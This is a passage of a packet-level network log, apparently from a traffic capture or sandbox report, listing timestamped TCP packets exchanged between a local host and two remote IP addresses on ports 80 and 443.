Sep 4, 2024 17:37:09.159135103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159145117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159154892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159163952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159173965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159182072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159183979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159193993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159197092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159204006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159214020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159218073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159223080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159236908 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159244061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159271002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159276009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159290075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159300089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159306049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159308910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159320116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159324884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159329891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159332037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159341097 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159346104 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159357071 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159382105 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159490108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159501076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159509897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159519911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159564018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159590006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159600019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159607887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159616947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159617901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159636021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159655094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159795046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159807920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159816027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159827948 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159838915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159843922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159847021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159848928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159859896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159869909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159876108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159878969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159890890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159894943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159914017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159925938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159933090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159941912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159953117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159959078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159960985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.159971952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.159986019 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211106062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211159945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211169958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211170912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211189032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211194992 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211200953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211209059 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211210012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211222887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211237907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211335897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211347103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211355925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211380959 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211393118 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211451054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211461067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211469889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211479902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211498022 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211520910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211646080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211657047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211664915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211674929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211685896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211692095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211715937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211715937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211729050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211736917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211762905 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211802959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211811066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211847067 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.211850882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.211890936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.212390900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212402105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212436914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212445974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212451935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.212470055 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.212496042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.212539911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212551117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212559938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212584019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.212599039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.212762117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212773085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212780952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212790012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212800026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212806940 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.212811947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212826967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212835073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.212837934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212845087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.212855101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.212867975 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.212877989 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.212893963 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.213201046 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.213217974 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.213262081 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.213270903 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.213311911 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.213690996 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.213705063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.213712931 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.213723898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.213756084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.213756084 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.213762999 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.213772058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.213781118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.213792086 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.213792086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.213812113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.213814974 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.213939905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.213948011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.213957071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.213975906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.213984013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.213984966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.213990927 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.214018106 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.214212894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.214224100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.214231968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.214242935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.214258909 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.214271069 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.214283943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.214307070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.214340925 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.214530945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.214540958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.214549065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.214556932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.214566946 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.214576006 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.214581966 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.214595079 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.214632988 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.214639902 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.214677095 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.214977980 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.214991093 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.215030909 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.215039015 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.215075970 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.215337992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.215349913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.215358019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.215369940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.215385914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.215406895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.215531111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.215540886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.215549946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.215558052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.215574026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.215581894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.216049910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.216063023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.216100931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.216208935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.216218948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.216243982 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.216254950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.216258049 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.216298103 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.216305017 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.216322899 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.216341972 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.216341972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.216353893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.216387033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.216397047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.216558933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.216568947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.216603994 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.216864109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.216913939 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.216948986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.216989994 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.218169928 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.218183994 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.218226910 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.218234062 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.218272924 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.219712973 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.219758987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.219763041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.219779015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.219799995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.219825029 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.219835043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.219845057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.219854116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.219861984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.219871044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.219877005 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.219898939 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.219906092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220218897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220230103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220237970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220249891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220258951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220267057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220268011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220279932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220287085 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220303059 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220314026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220433950 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220443964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220453024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220463991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220474005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220475912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220499039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220506907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220551014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220561981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220597982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220679045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220691919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220700026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220709085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220719099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220724106 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220730066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220740080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220748901 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220756054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220757008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220777035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220793009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.220963001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220973969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220982075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.220993042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.221008062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.221014977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.221024990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.221030951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.221035004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.221045971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.221050978 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.221056938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.221070051 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.221071959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.221082926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.221090078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.221093893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.221098900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.221121073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.221138954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.221148014 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.221163988 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.221204996 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.221213102 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.221251011 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.222937107 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.222944021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.222953081 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.223002911 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.223002911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.223011971 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.223028898 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.223042965 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.223047972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.223059893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.223069906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.223078966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.223088980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.223090887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.223098040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.223105907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.223134041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.224760056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.224771023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.224778891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.224803925 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.224812031 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.224829912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.224868059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.224908113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.224919081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.224948883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.225035906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.225045919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.225054979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.225064039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.225083113 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.225084066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.225094080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.225114107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.225120068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.225131035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.225138903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.225150108 CEST	80	49719	147.45.44.104	192.168.2.6
